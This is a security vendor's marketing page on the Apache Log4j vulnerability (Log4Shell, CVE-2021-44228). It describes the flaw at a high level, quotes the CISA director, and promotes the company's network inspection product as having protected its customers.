Apache Log4j Vulnerability

What You Need to Know

Apache Log4j – What Is It?

Apache Log4j is a widely used Java logging library used for performance and security information. It is broadly deployed in many different consumer and enterprise services, websites and applications.

Apache Log4j Vulnerability Exploits Are Serious

“This vulnerability, which is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use… We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies -- and signals to non-federal partners -- to urgently patch or remediate this vulnerability…To be clear, this vulnerability poses a severe risk.“1
—Jen Easterly
CISA Director

Want to Learn More?

We are ready to help you with Log4j and any other cybersecurity challenges you may have. Download the “Trinity Cyber and Apache Log4j:  Stay Secure Before, During and After Patching” white paper below for more details and information.

 

Recently, a critical remote code execution (RCE) vulnerability (CVE-2021-44228) in Apache’s Log4j 2 software library was publicly disclosed. This flaw, sometimes called “Logjam” or “Log4Shell”, provides attackers the ability to execute arbitrary code on all impacted systems by sending malicious code to the Log4j queue and enabling them to potentially take control of affected systems. Hackers launched over 840,000 attacks on companies globally within the first few days of the vulnerability becoming public.2 

New mutations and additional flaws are continually being discovered in the wild. For instance, according to an Apache.org security advisory, the newly identified CVE-2021-45046 could enable attackers to create malicious input data, resulting in a Denial-of-Service (DoS) condition in certain non-default configurations. We expect and are actively vigilant for additional Log4j variants.

Trinity Cyber’s Core Tech is NOT Vulnerable to Log4j Exploits

Trinity Cyber’s technology does not employ the affected library in our systems, so customer data is not vulnerable to Log4j exploitation. For our customers, we immediately deployed automated protections and hunting capabilities. Inbound networks sessions containing Log4j exploits are automatically dropped while our discovery efforts are continuously finding new delivery methods and obfuscation techniques.

log4j_pretty_darkmode

Creating Time for an Orderly Log4j Patch Cycle

While others are scrambling to monitor and patch critical systems, Trinity Cyber customers were protected from any attempt to exploit the Log4j vulnerability. Our technologies were tuned within the first few hours to detect and drop scanning and exploit attempts (even obfuscated ones) from network traffic. As a result, Trinity Cyber customers are now conducting a methodical, scheduled and managed patch process. Their systems and reputations were protected and secured by Trinity Cyber. This is another example of why our breakthrough technology’s ability to see more, do more and stop more is simply better with our innovative, contextual approach.

Trinity Cyber

Core Premise

The premise of Trinity Cyber’s technology is simple and unique.

Every Internet session can and should be fully staged, parsed and deeply inspected inline (not in a sandbox) in context, and with endpoint and application layer fidelity before it enters or leaves a customer’s control. At the same time, automated processes must be run to remove or alter malicious content from files and protocol fields at speed and scale to affect the outcome in favor of the customer. This must be done without introducing latency or degrading the customer’s Internet experience.

© 2020 Trinity Cyber, Inc. All Rights Reserved.